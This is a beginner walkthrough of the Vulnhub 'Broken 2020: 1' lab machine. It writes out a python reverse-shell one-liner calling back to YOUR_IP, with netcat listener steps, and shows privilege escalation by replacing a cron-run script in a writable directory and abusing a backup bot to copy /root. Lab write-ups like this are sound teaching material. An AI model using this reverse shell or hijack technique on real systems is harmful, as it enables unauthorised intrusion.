Broken 2020: 1 Vulnhub Walkthrough

Broken 2020 is a beginner level virtual machine created by EuSecinfo. There was no running of public exploits, no rabbit holes in the machine, however, there was a need of custom exploitation and little bit of common sense.

Table of Content:

1. Reconnaisance

a) Nmap and directory enumeration

b) Locating a malicious script to gain shell access

2. Exploitation

a) Writing our own script to gain reverse shell

3. Post Exploitation

a) Gaining alice’s shell by modifying a python script

b) Understanding algorithm of script’s working

4. Snagging the flag

a) Manipulating a script to read root flag

Lets start

We detected IP address of the vulnerable machine and ran nmap scan on it to begin with.

We could only find port 80 open.

We immediately scrolled to the website but didn’t find anything useful over there.

Next obvious step was to run directory enumeration. We used dirb for the purpose and found a directory “/cms”

It looked like an installation page of a CMS. We clicked install.

Upon clicking install, something vague happened and seemed like it was a trap.

Here we could see flag 1 and it is self explanatory, our website got defaced by that installation of CMS.

However, since the website got defaced, some change in directories, new files, or some payload must have been executed or created. So we ran directory enumeration once more in the “/cms” directory.

A new directory called “/cc/” seemed to have been created by this installation. We head over there to see what had been created. As the page explains itself, it is a malicious script that is used to connect the server to a remote IP with a remote port! That means a ready made shell. But lets see what it actually does first by inputting a random IP and port.

Hence, it is searching for some script in the designated IP. Lets actually create a simple python server and see what script it is searching for.

So, it was asking for a shell script with a random system generated name. So, we created a script with the specified name with a python reverse shell code in it (Pentest Monkey python reverse shell). Make sure you also launch a netcat reverse listener on port 8888 in a new terminal window.

Upon inputting this python server’s IP and port we see a new status code in the website.

Meanwhile, on our other terminal we saw a shell was obtained. We traversed to /home/alice directory and read our next flag. There was also a note left there that said that a script log.py was created to clear apache logs.

Upon inspecting log.py we saw that it was clearing out apache logs and creating a log file “clear.log” that was updated every time the machine cleared it.

Here is the catch: upon inspecting clear.log we found that the logs were being cleared after every 1 minute sharp. This could be due to a cron job. Since, the script log.py is being run as alice we could gain alice’s account access if we somehow manage to insert our reverse shell code in log.py.

Now, log.py is not editable by www-data (current user) but the directory is writable! So we replaced the log.py file with our own log.py file as below.

1. Create a log.py file in our own system with the code as used before:

Code: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

2. Launch a python server

3. Rename the existing log.py in the VM’s session to log_new.py

4. Copy log.py using wget command and give execute permissions.

In a new terminal, start a netcat listener on port specified in the payload. Here, 5555, and wait for a reverse shell.

Surely, we received alice’s shell. Now we traversed through directories and found a /back directory with backup folder. There we snagged our third flag!

Now, we saw a note.txt too which had a message saying “Please put path of the website backup directory in path.txt and bot will do the rest.” That means, those three scripts (backup.py, check.py and hack.sh) were doing something using the contents in path.txt

 Upon analysing the three scripts we understood that the bot (scripts) are picking up the contents in the directory specified in “path.txt” and copying it in the current directory! That solved our purpose since we can just dump the contents of /root directory using this.

Hence, we input /root in path.txt with the command:

Echo “/root” > path.txt

After waiting for about a minute again, we easily saw the contents of root directory and read the congratulatory flag!

Broken 2020: 1 Vulnhub Walkthrough

Trending Articles

Scuffham Amps - S-GEAR 2.6.0 VST, AAX, STANDALONE x86 x64 (R2R NO iLok2, +NO...

Practice Sheet of Right form of verbs for HSC Students

VHSE First (1st) Allotment 2025 - vhscap.kerala.gov.in

UNIVERSE LEAGUE – UNIVERSE LEAGUE – WAR (We Are Ready) – EP [iTunes Plus M4A]

City Hunter Teledrama – Episode 18 – 07th May 2016

Comment on Proposed Criteria for Identifying Predatory Conferences by Luke...

Bureau of Internal Revenue: Regional Offices (Directory)

Kendrick Lamar – Not Like Us (2024) [24Bit-88.2kHz] [PMEDIA] ⭐️

Inception 2010 Hindi Dual Audio 650MB BRRip 720p ESubs HEVC

East Hull MD admits sexual assaults after another victim comes forward

Download: FK ft Shenky – Nakuyewa ”Prod by: Shenky”

R. v. Sargeant, 2023 ONSC 6406 (CanLII)

Rajasthan Board 10th Result 2016 Roll No wise & Name Wise

Who’s been sentenced at Northampton Magistrates’ Court

मतलबी दोस्त स्टेट्स | Matlabi Dost Status in Hindi – Selfish Friends Status

Family cries out as traditional ruler allegedly abducts brother, extorts N2.5m

Long-Running Conflict In Springfield (MA) Gangland Sphere Has Manzi Family &...

Wondershare Filmora X v10.1.20.16 x64

Man arrested after fracas in flat

Man charged in ongoing Sexual Assault Investigation Derek Nyilas, 46, Faces...